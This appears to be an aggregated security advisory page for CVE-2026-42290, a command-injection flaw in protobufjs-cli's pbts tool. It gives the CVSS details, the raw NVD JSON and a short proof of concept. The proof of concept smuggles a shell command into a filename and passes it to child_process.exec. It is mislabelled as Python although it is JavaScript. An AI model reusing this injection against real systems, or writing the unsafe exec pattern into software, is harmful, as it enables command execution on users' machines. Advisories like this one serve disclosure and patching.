Security Vulnerability Report
中文
CVE-2026-42290 CVSS 7.8 HIGH

CVE-2026-42290

Published: 2026-05-13 16:16:47
Last Modified: 2026-05-13 16:32:31
Source: [email protected]

Description

protobufjs-cli is the command line add-on for protobuf.js. Prior to 1.2.1 and 2.0.2, pbts invoked JSDoc by building a shell command string from input file paths and executing it through child_process.exec. File paths containing shell metacharacters could therefore be interpreted by the shell instead of being passed to JSDoc as plain arguments. This vulnerability is fixed in 1.2.1 and 2.0.2.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

protobufjs-cli < 1.2.1
protobufjs-cli < 2.0.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2026-42290: protobufjs-cli Command Injection // Description: This script demonstrates the vulnerability where filenames with shell metacharacters // lead to command execution when processed by the vulnerable 'pbts' tool. const fs = require('fs'); const { exec } = require('child_process'); // Step 1: Attacker creates a malicious filename containing shell metacharacters // The semicolon (;) acts as a command separator in Unix shells. const maliciousFilename = "safe_file.proto; echo 'VULNERABILITY_EXPLOITED' > /tmp/pwned.txt"; console.log(`[+] Attempting to create file with name: ${maliciousFilename}`); // Create a dummy file with the malicious name (Note: Some filesystems restrict special chars) try { fs.writeFileSync(maliciousFilename, "syntax = \"proto3\";"); console.log("[+] File created successfully."); } catch (err) { console.log("[-] Could not create file directly (OS restriction), but the logic remains the same."); } // Step 2: Simulate the vulnerable 'pbts' logic // The vulnerable code constructs the command string using the filename directly const command = `jsdoc ${maliciousFilename}`; console.log(`[!] Executing vulnerable command: ${command}`); // Step 3: Execution // In the real scenario, 'exec' passes this string to /bin/sh, executing both 'jsdoc' and 'echo' exec(command, (error, stdout, stderr) => { if (error) { console.error(`Error: ${error.message}`); return; } if (stderr) { console.error(`Stderr: ${stderr}`); return; } console.log(`Output: ${stdout}`); });

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-42290", "sourceIdentifier": "[email protected]", "published": "2026-05-13T16:16:47.160", "lastModified": "2026-05-13T16:32:31.457", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "protobufjs-cli is the command line add-on for protobuf.js. Prior to 1.2.1 and 2.0.2, pbts invoked JSDoc by building a shell command string from input file paths and executing it through child_process.exec. File paths containing shell metacharacters could therefore be interpreted by the shell instead of being passed to JSDoc as plain arguments. This vulnerability is fixed in 1.2.1 and 2.0.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://github.com/protobufjs/protobuf.js/security/advisories/GHSA-f84p-cvgm-xgjj", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.